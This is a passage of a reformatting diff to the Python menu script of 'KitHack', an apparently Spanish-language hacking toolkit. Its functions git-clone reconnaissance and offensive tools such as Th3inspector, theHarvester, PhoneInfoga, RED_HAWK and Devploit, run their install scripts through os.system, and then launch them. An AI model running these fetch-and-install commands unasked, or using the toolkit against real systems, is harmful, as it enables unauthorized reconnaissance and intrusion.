{2}/tools/Spoofing/GOD-KILLER" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("GOD-KILLER") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("GOD-KILLER") + + +# Tools Information Gathering + + def NMAP(): - if not os.path.isdir('tools/InformationGathering/nmap'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/nmap/nmap.git && cd nmap && bash configure && make && make install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/nmap".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('nmap') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('nmap') + if not os.path.isdir("tools/InformationGathering/nmap"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/nmap/nmap.git && cd nmap && bash configure && make && make install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/nmap" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("nmap") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("nmap") + def Th3inspector(): - if not os.path.isdir('tools/InformationGathering/Th3inspector'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/Moham3dRiahi/Th3inspector.git && cd Th3inspector && chmod +x install.sh && bash install.sh') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Th3inspector".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd Th3inspector && perl Th3inspector.pl -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd Th3inspector && perl Th3inspector.pl -h') + if not os.path.isdir("tools/InformationGathering/Th3inspector"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/Moham3dRiahi/Th3inspector.git && cd Th3inspector && chmod +x install.sh && bash install.sh" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Th3inspector" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd Th3inspector && perl Th3inspector.pl -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd Th3inspector && perl Th3inspector.pl -h" + ) + def FBI(): - if not os.path.isdir('tools/InformationGathering/fbi'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/xHak9x/fbi.git && cd fbi && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/fbi".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd fbi && python2 fbi.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd fbi && python2 fbi.py') + if not os.path.isdir("tools/InformationGathering/fbi"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/xHak9x/fbi.git && cd fbi && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/fbi" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd fbi && python2 fbi.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd fbi && python2 fbi.py" + ) + def Infoga(): - if not os.path.isdir('tools/InformationGathering/Infoga'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/m4ll0k/Infoga.git && cd Infoga && python setup.py install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Infoga".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd Infoga && python infoga.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd Infoga && python infoga.py') + if not os.path.isdir("tools/InformationGathering/Infoga"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/m4ll0k/Infoga.git && cd Infoga && python setup.py install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Infoga" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd Infoga && python infoga.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd Infoga && python infoga.py" + ) + def Crips(): - if not os.path.isdir('tools/InformationGathering/Crips'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/Manisso/Crips.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Crips".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd Crips && python Crips.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd Crips && python Crips.py') + if not os.path.isdir("tools/InformationGathering/Crips"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/Manisso/Crips.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Crips" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd Crips && python Crips.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd Crips && python Crips.py" + ) + def BillCipher(): - if not os.path.isdir('tools/InformationGathering/billcipher'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt update && apt install ruby python python-pip python3 python3-pip && apt install httrack whatweb && cd tools && cd InformationGathering && git clone https://github.com/GitHackTools/BillCipher.git && cd BillCipher && pip install -r requirements.txt && pip3 install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/BillCipher".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd BillCipher && python3 billcipher.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd BillCipher && python3 billcipher.py') + if not os.path.isdir("tools/InformationGathering/billcipher"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt update && apt install ruby python python-pip python3 python3-pip && apt install httrack whatweb && cd tools && cd InformationGathering && git clone https://github.com/GitHackTools/BillCipher.git && cd BillCipher && pip install -r requirements.txt && pip3 install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/BillCipher" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd BillCipher && python3 billcipher.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd BillCipher && python3 billcipher.py" + ) + def RedHawk(): - if not os.path.isdir('tools/InformationGathering/RED_HAWK'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install php7.2 && cd tools && cd InformationGathering && git clone https://github.com/Tuhinshubhra/RED_HAWK.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/RED_HAWK".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd RED_HAWK && php redh.php') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd RED_HAWK && php redh.php') + if not os.path.isdir("tools/InformationGathering/RED_HAWK"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install php7.2 && cd tools && cd InformationGathering && git clone https://github.com/Tuhinshubhra/RED_HAWK.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/RED_HAWK" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd RED_HAWK && php redh.php" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd RED_HAWK && php redh.php" + ) + def ReconNg(): - if not os.path.isdir('tools/InformationGathering/recon-ng'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt-get install python3.6 && cd tools && cd InformationGathering && git clone https://github.com/lanmaster53/recon-ng.git && cd recon-ng && pip install -r REQUIREMENTS') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/recon-ng".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd recon-ng && python3 recon-ng') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd recon-ng && python3 recon-ng') + if not os.path.isdir("tools/InformationGathering/recon-ng"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt-get install python3.6 && cd tools && cd InformationGathering && git clone https://github.com/lanmaster53/recon-ng.git && cd recon-ng && pip install -r REQUIREMENTS" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/recon-ng" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd recon-ng && python3 recon-ng" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd recon-ng && python3 recon-ng" + ) + def theHarvester(): - if not os.path.isdir('tools/InformationGathering/theHarvester'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/alanchavez88/theHarvester.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/theHarvester".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd theHarvester && python theHarvester.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd theHarvester && python theHarvester.py') + if not os.path.isdir("tools/InformationGathering/theHarvester"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/alanchavez88/theHarvester.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/theHarvester" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd theHarvester && python theHarvester.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd theHarvester && python theHarvester.py" + ) + def PhoneInfoga(): - if not os.path.isdir('tools/InformationGathering/PhoneInfoga'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('apt install python3-pip && cd tools && cd InformationGathering && git clone https://github.com/sundowndev/PhoneInfoga.git && cd PhoneInfoga && python3 -m pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/PhoneInfoga".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd PhoneInfoga && python3 phoneinfoga.py -h') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd PhoneInfoga && python3 phoneinfoga.py -h') + if not os.path.isdir("tools/InformationGathering/PhoneInfoga"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "apt install python3-pip && cd tools && cd InformationGathering && git clone https://github.com/sundowndev/PhoneInfoga.git && cd PhoneInfoga && python3 -m pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/PhoneInfoga" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd PhoneInfoga && python3 phoneinfoga.py -h" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd PhoneInfoga && python3 phoneinfoga.py -h" + ) + def Gasmask(): - if not os.path.isdir('tools/InformationGathering/gasmask'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/twelvesec/gasmask.git && cd gasmask && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/gasmask".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd gasmask && python gasmask.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd gasmask && python gasmask.py') + if not os.path.isdir("tools/InformationGathering/gasmask"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/twelvesec/gasmask.git && cd gasmask && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/gasmask" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd gasmask && python gasmask.py" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd gasmask && python gasmask.py" + ) + def URLextractor(): - if not os.path.isdir('tools/InformationGathering/URLextractor'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/eschultze/URLextractor.git') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/URLextractor".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd URLextractor && bash extractor.sh') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd URLextractor && bash extractor.sh') + if not os.path.isdir("tools/InformationGathering/URLextractor"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/eschultze/URLextractor.git" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/URLextractor" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd URLextractor && bash extractor.sh" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd URLextractor && bash extractor.sh" + ) + def Devploit(): - if not os.path.isdir('tools/InformationGathering/Devploit'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/GhettoCole/Devploit.git && cd Devploit && chmod +x install && bash install') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Devploit".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('Devploit') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('Devploit') + if not os.path.isdir("tools/InformationGathering/Devploit"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/GhettoCole/Devploit.git && cd Devploit && chmod +x install && bash install" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/Devploit" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("Devploit") + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system("Devploit") + def ReconDog(): - if not os.path.isdir('tools/InformationGathering/ReconDog'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/s0md3v/ReconDog.git && cd ReconDog && pip install -r requirements.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/ReconDog".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd ReconDog && python dog') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd ReconDog && python dog') + if not os.path.isdir("tools/InformationGathering/ReconDog"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/s0md3v/ReconDog.git && cd ReconDog && pip install -r requirements.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/ReconDog" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd ReconDog && python dog" + ) + else: + print("\n{}[X] Esta herramienta ya existe...".format(RED)) + time.sleep(2) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + GREEN, RED, DEFAULT)).upper() != "Y"): + os.system("clear") + main() + else: + os.system( + "cd tools && cd InformationGathering && cd ReconDog && python dog" + ) + def Webkiller(): - if not os.path.isdir('tools/InformationGathering/webkiller'): - print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) - time.sleep(4) - os.system('cd tools && cd InformationGathering && git clone https://github.com/ultrasecurity/webkiller.git && cd webkiller && pip3 install -r requirments.txt') - print("\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/webkiller".format(GREEN, DEFAULT, location)) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd webkiller && python3 webkiller.py') - else: - print("\n{}[X] Esta herramienta ya existe...".format(RED)) - time.sleep(2) - if input("\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format(GREEN, RED, DEFAULT)).upper() != "Y": - os.system('clear') - main() - else: - os.system('cd tools && cd InformationGathering && cd webkiller && python3 webkiller.py') + if not os.path.isdir("tools/InformationGathering/webkiller"): + print("\n{0}[*] Downloading tool...{1}".format(GREEN, DEFAULT)) + time.sleep(4) + os.system( + "cd tools && cd InformationGathering && git clone https://github.com/ultrasecurity/webkiller.git && cd webkiller && pip3 install -r requirments.txt" + ) + print( + "\n{0}[✔] Done.{1}\nHerramienta guardada en {2}/tools/InformationGathering/webkiller" + .format(GREEN, DEFAULT, location)) + if (input( + "\n{0}[!] ¿Desea ejecutarla? (y/n)\n{1}KitHack >>{2} ".format( + 